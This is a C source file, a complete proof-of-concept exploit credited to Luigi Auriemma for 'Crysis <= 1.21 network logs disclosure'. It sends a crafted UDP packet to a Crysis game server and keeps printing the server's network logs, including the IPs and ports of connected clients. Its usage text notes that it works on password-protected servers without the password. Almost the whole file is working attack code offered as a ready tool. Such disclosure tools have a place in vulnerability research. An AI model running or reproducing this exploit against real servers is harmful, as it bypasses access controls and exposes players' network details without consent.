/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0x1000
#define PORT        64087
#define MAXSOCKS    65      // max 32
#define MAXCRC      64      // max 16
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00"                    "\xff\x00\x00" "\x00"
#define GS3_QUERY   "\xfe\xfd\x09" "\x00\x00\x00\x00"
#define GS3_QUERYX  "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00"



void show_logs(u8 *data, int size);
int crysis_get_type(int type);
int crysis_set_type(int type);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
u32 mycrc(u8 *data, int size);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



static const u8 crysis_type_table[256] =    // pre-built here
    "\x0A\x00\x00\x5C\x7A\x61\x00\x2C\x46\x80\x00\x21\x57\x00\x00\x4F"
    "\x00\x19\x1C\x00\x00\x5D\x00\x71\x12\x00\x00\x00\x51\x1E\x03\x33"
    "\x00\x13\x84\x00\x27\x00\x4E\x00\x8C\x00\x00\x00\x00\x50\x00\x2B"
    "\x3C\x82\x47\x28\x00\x11\x8D\x00\x70\x42\x0D\x01\x07\x09\x08\x05"
    "\x00\x34\x00\x6B\x10\x66\x6D\x00\x00\x39\x00\x78\x00\x00\x55\x59"
    "\x04\x00\x00\x72\x63\x00\x87\x00\x00\x00\x00\x00\x58\x67\x48\x2D"
    "\x3B\x4C\x35\x00\x26\x00\x03\x89\x00\x1A\x03\x00\x6A\x30\x83\x4A"
    "\x00\x0B\x8B\x00\x5A\x74\x00\x7D\x14\x18\x4B\x00\x00\x00\x6C\x1B"
    "\x00\x20\x00\x45\x38\x0E\x3A\x25\x86\x00\x00\x6F\x00\x5B\x00\x24"
    "\x00\x62\x00\x00\x00\x8E\x44\x00\x88\x7E\x0C\x23\x00\x36\x00\x00"
    "\x31\x00\x5F\x53\x90\x7B\x7C\x00\x41\x73\x60\x3D\x76\x00\x5E\x8A"
    "\x00\x68\x03\x3F\x00\x00\x8F\x16\x17\x00\x85\x00\x00\x00\x56\x15"
    "\x75\x00\x1D\x00\x40\x00\x00\x00\x29\x00\x4D\x22\x00\x00\x2A\x43"
    "\x7F\x3E\x2E\x00\x1F\x00\x00\x6E\x00\x00\x00\x49\x00\x00\x00\x00"
    "\x69\x00\x00\x00\x2F\x00\x32\x37\x54\x52\x00\x77\x00\x65\x00\x00"
    "\x79\x00\x00\x00\x00\x64\x0F\x81\x00\x00\x00\x00\x03\x03\x02\x06";



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        peerl;
    int     sd,
            len,
            type;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Crysis <= 1.21 network logs disclosure "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n"
            "works also with servers protected by password without knowing the keyword!\n"
            "can be used also directly with the clients (IP and ports of each client are\n"
            "visible in the logs of the server in some moments)\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    show_logs(NULL, -1);
    printf("- start the visualization of the remote network logs (delay of one second):\n\n");

    for(;;) {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        do {                        // REQUIRED for having a refresh of the logs each time!
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);

        p = buff;
        *p++ = crysis_set_type(0x8c);
        len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);
        type = crysis_get_type(buff[0]);

        if((type == 0x08) && (len > 2)) {
            show_logs(buff + 2, len - 2);
        }

        close(sd);
        sleep(ONESEC);
    }
    return(0);
}



void show_logs(u8 *data, int size) {
    static u32  old_crc[MAXCRC];
    static  int old_line;
    u32     new_crc[MAXCRC];
    int     i,
            line;
    u8      *p,
            *l;

    if(!data || (size < 0)) {
        memset(&old_crc, 0, sizeof(old_crc));
        old_line = 0;
        return;
    }

    l = data + size - 1;
    for(p = data; p <= l; p++) {    // skip the error received from the server
        if(*p == '\n') {
            p++;
            break;
        }
    }
    size -= (p - data);
    data = p;                       // now the last is the first, so I need to revert them

    for(line = 0, l = data + size - 1; l >= data; l = p, line++) {
        for(p = l - 1; p >= data; p--) {
            if(*p == '\n') break;
        }
        if(line >= MAXCRC) break;
        new_crc[line] = mycrc(p + 1, l - p);
    }

    for(line = 0, l = data + size - 1; l >= data; l = p, line++) {
        for(p = l - 1; p >= data; p--) {
            if(*p == '\n') break;
        }
        for(i = 0; i < old_line; i++) {
            if(new_crc[line] == old_crc[i]) break;
        }
        if(i < old_line) continue;
        fwrite(p + 1, 1, l - p, stdout);
        if(!line) fputc('\n', stdout);
    }

    memcpy(old_crc, new_crc, line * 4);
    old_line = line;
}



int crysis_get_type(int type) {
    type = crysis_type_table[type];
    if((type >= 0xb) && (type <= 0x4a) && ((type - 0x4b) <= 0x3f)) return(-1);
    return(type);
}



int crysis_set_type(int type) {
    int     i;

    for(i = 0; i < 256; i++) {
        if(type == crysis_type_table[i]) return(i);
    }
    return(-1);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            //fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 2)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    //fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



u32 mycrc(u8 *data, int size) {
    const static u32   crctable[] = {
        0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
        0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
        0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
        0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
        0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
        0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
        0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
        0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
        0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
        0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
        0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
        0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
        0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
        0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
        0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
        0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
        0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
        0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
        0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
        0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
        0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
        0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
        0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
        0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
        0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
        0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
        0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
        0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
        0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
        0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
        0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
        0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
        0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
        0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
        0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
        0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
        0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
        0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
        0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
        0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
        0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
        0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
        0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
        0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
        0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
        0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
        0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
        0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
        0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
        0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
        0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
        0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
        0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
        0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
        0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
        0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
        0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
        0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
        0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
        0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
        0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
        0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
        0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
        0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d };
    u32    crc = 0xffffffff;

    while(size--) {
        crc = crctable[*data ^ (crc & 0xff)] ^ (crc >> 8);
        data++;
    }
    return(~crc);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


